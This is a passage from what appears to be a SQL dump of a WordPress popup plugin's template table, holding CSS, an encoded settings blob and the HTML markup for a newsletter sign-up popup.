ie10+ */\r\n  background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\', endColorstr=\'[bg_color_1]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 10% 15% 0;\r\n	text-align:center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 1px solid #d1b36d;\r\n  	color: #888;\r\n	text-shadow: 1px 1px 5px #888;\r\n  	padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	font-size: 17px;\r\n	width:100%;\r\n  	background-color: #fff;\r\n  	padding-left: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #888;\r\n	text-shadow: 1px 1px 5px #888;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/mail-icon.png\");\r\n  	background-repeat: no-repeat;\r\n  	background-position: 90% center;\r\n	width:100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n	width: 60%;\r\n  	[if bg_type_2 == \'color\']\r\n  	background: [bg_color_2];\r\n   box-shadow: -4px -4px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 1px 1px 1px #000;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 80%;\r\n	margin-left: 10%;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n	float: right;\r\n    [if enb_txt_0]\r\n    width: 50%;\r\n    [else]\r\n    width: 100%;\r\n    [endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	top:15px;\r\n  	right:10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\nmargin-top:20px;\r\n}','layered-popup.jpg',1,1,1,1,0,0,0,'2015-01-10 17:59:43',1,0),(9,'SIGN UP',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6ODg6e3M6NToid2lkdGgiO3M6MzoiNDAwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiIzhjNzc2NCI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiM3NTM2MmMiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjZmZmZmZmIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiNmOWU2Y2UiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM1ODU4NTgiO3M6MTU6InJlc3BvbnNpdmVfbW9kZSI7czozOiJkZWYiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6MTE6IndoaWxlX2Nsb3NlIjtzOjc6ImJ1bGxldHMiO3M6MTE6Imxpc3RzX2dyZWVuIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MzA6IlNJR04gVVA8YnI+IHRvIG91ciBOZXdzbGV0dGVyISI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE4OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUgIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6NDoiYm94eSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfZ3JfY3ljbGVfZGF5IjtzOjE6IjAiO3M6MTM6InN1Yl9pY19hcHBfaWQiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3VzZXIiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3Bhc3MiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTM6InN1Yl9zZl9hcHBfaWQiO3M6MDoiIjtzOjE0OiJzdWJfY2tfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9tZW1fYWNjX2lkIjtzOjA6IiI7czoxNToic3ViX21lbV9wdWRfa2V5IjtzOjA6IiI7czoxNjoic3ViX21lbV9wcml2X2tleSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjIwOiJzdWJfdHh0X2V4aXN0c19lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6NzoiU0lHTiBVUCI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo4OiJsb2dpbl9ieSI7czo4OiJ1c2VybmFtZSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjU6IkxvZ2luIjtzOjIzOiJyZWdfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxMzoicmVnX2J0bl9sYWJlbCI7czo4OiJSZWdpc3RlciI7czoxMDoicmVnX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoicmVnX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InJlZ190eHRfc3VjY2VzcyI7czoyNzoiVGhhbmsgeW91IGZvciByZWdpc3RyYXRpb24hIjtzOjIxOiJyZWdfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InJlZ19yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6NToidHh0XzAiO3M6MTcyOiI8cD5Qb3B1cCBieSBTdXBzeXN0aWMgbGV0cyB5b3UgZWFzaWx5IGNyZWF0ZSBlbGVnYW50IG92ZXJsYXBwaW5nIHdpbmRvd3Mgd2l0aCB1bmxpbWl0ZWQgZmVhdHVyZXMuIFBvcC11cHMgd2l0aCBTbGlkZXIsIExpZ2h0Ym94LCBDb250YWN0IGFuZCBTdWJzY3JpcHRpb24gZm9ybXMgYW5kIG1vcmU8L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIyIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Amatic+SC\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \'arial\', arial;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #f9e6ce;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n  	box-shadow: rgba(192,192,192,1) 0 4px 20px, 6px -6px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	border-radius: 4px;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #FFF;\r\n	font-family: \'Amatic SC\', arial;\r\n	font-size: 45px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 10% 10% 5% 5%;\r\n	text-align:right;\r\n	margin-bottom: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	/*width: 100%;*/\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 0px solid #d1b36d;\r\n	border-radius: 4px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 20px;\r\n  	font-size: 17px;\r\n	width:100%;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n  	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	margin-left: -4px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/email-icon.png\");\r\n  	background-repeat: no-repeat;\r\n	width:100%;\r\n	background-attachment: scroll;\r\n	background-position: 0px center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n	width: 60%;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1] 100%;\r\n   	box-shadow: -4px -4px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	background-image: none;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 1px 1px 1px #000;\r\n  	cursor: pointer;\r\n  	padding: 0 6px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 80%;\r\n	margin-left: 10%;\r\n	text-align: justify;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n  	top:15px;\r\n  	right:10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] input[name=\"name\"] {\r\n    background-image: url(\"[PPS_ASSETS_URL]img/assets/user-icon.png\");\r\n    background-repeat: no-repeat;\r\n    background-attachment: scroll;\r\n    background-position: 0px center;\r\n}','sing-up.jpg',1,1,1,1,0,0,0,'2015-01-10 